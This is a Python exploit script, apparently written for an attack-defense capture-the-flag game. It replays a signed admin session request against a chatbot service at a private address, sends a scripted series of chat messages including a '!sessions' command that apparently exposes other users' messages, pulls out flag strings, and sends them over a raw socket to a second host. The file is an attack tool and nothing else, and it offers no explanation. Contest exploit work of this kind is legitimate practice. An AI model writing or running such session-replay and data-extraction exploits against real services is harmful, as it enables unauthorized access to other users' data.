exploit2.py

import requests
import json
import socket

def netcat(hostname, port, content):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((hostname, port))
    s.sendall(content)
    s.shutdown(socket.SHUT_WR)
    while 1:
        data = s.recv(1024)
        if data.decode() == '':
            break
        print("Received:", repr(data))
    print("Connection closed.")
    s.close()

# allows us to store cookies that we receive and send
session = requests.Session()

r1 = session.post('http://10.1.16.1:8011/admin/session/begin?parameters=%7B%22state%22%3A+%22chat%5C%5Cgreeting%5C%5CGreetingState%22%2C+%22extras%22%3A+%22joke%2Cphysical-sick%2Csevere-physical-sick%2Ceve%2Cambulance%2Cphysical-sick%2Csick%2Cmorning-chat%22%2C+%22language%22%3A+%22en%22%2C+%22timezone%22%3A+%22America%2FManagua%22%7D&signature=N3mzOPWaWsK%2FM67krE3i%2FSlObX66MgDtZazd4Cm6u75BDmQlelqwZO29j1qT5Fxru3acMvQSfacIXBZtr8OTnBTQ22iJrRrVeTSZcGL41iRCycAYOvigckW6Uz%2BhZfJhCIT2scWXnMf1PAloaXRUI%2Blz%2B3cgd1lFM7Vz6XDYSgIZNheGRH190ECxPX9TLlq7XH8J%2FXqUOr1Vw0TbPZNhFrDfQJ7YzohHCLyV8NvDIE1luhK2RGs8EzT4iIovd69roV8p%2FqE96NfKUlXLuLaCGQ8ycyEAd9ynHorSEmxenfFhE19vtNg%2FV1MQe37bdp7hGvS%2ByZtDqGJS90suY68licVMg4lzWM7NTq3O8C1dj%2FvFhwTu3xkrFWgYVXHn2vvqd15aJTYNdKaeI%2BCE1Nr92FDVeQtGq5NykIgupa738M5Q1i3dtrzVj%2FnaeyqwdldWeBlM%2Btzw4A3%2Fgm2mTLN7UyutUwXLBJc4nWswYH4zo6zlKi5dDECOrNb1Lk6FmnByxXx9kxdMZztRl9z6RQAp9WF70ofRWkXp8un%2BCZZ7E3WjallMJ%2BObDVC0XjLMjRLCmJCOnTQkIirowf1eYKmHbN1rf4l2qVn80bJfTNNTPsBqnssO%2Finzcu4XpkwkpIk37WdctWZF2ITm%2B2aXUCQlSdQWOTTAE0JD3XnrBCk%2B5bM%3D')

# parses response
response = json.loads(r1.text)

#print(r1.text)
#print(session.cookies.get_dict())

secret = response["secret"]
sessionID = response["session"]
profileID = response["profile_id"]
#print(secret, sessionID, profileID)

# first message
r2 = session.get('http://10.1.16.1:8011/chat/messages?session='+sessionID+'&secret='+secret+'&message=%21sessions')

# second message
r3 = session.post('http://10.1.16.1:8011/chat?session='+sessionID+'&secret='+secret+'&message=The+weather+is+nice+today%2C+isn%27t+it%3F+%F0%9F%97%9C')

# third message
r4 = session.post('http://10.1.16.1:8011/chat?session='+sessionID+'&secret='+secret+'&message=tell+me+a+joke')

# fourth message
r5 = session.post('http://10.1.16.1:8011/chat?session='+sessionID+'&secret='+secret+'&message=01101000+01100101+01101100+01101100+01101111+%F0%9F%A4%96')

# last message
r6 = session.post('http://10.1.16.1:8011/chat?session='+sessionID+'&secret='+secret+'&message=%21sessions')
#print(r6.text)

messages = json.loads(r6.text)["messages"]
flags = []

for message in messages:
    if "ENO" in message:
        flags.append(message)

finalFlags = []

for flag in flags:
    almost = flag[flag.index("-")+2:]
    finalFlags.append(almost)

print(finalFlags)

for flag in finalFlags:
    netcat("10.0.13.37", 1337, str.encode(flag))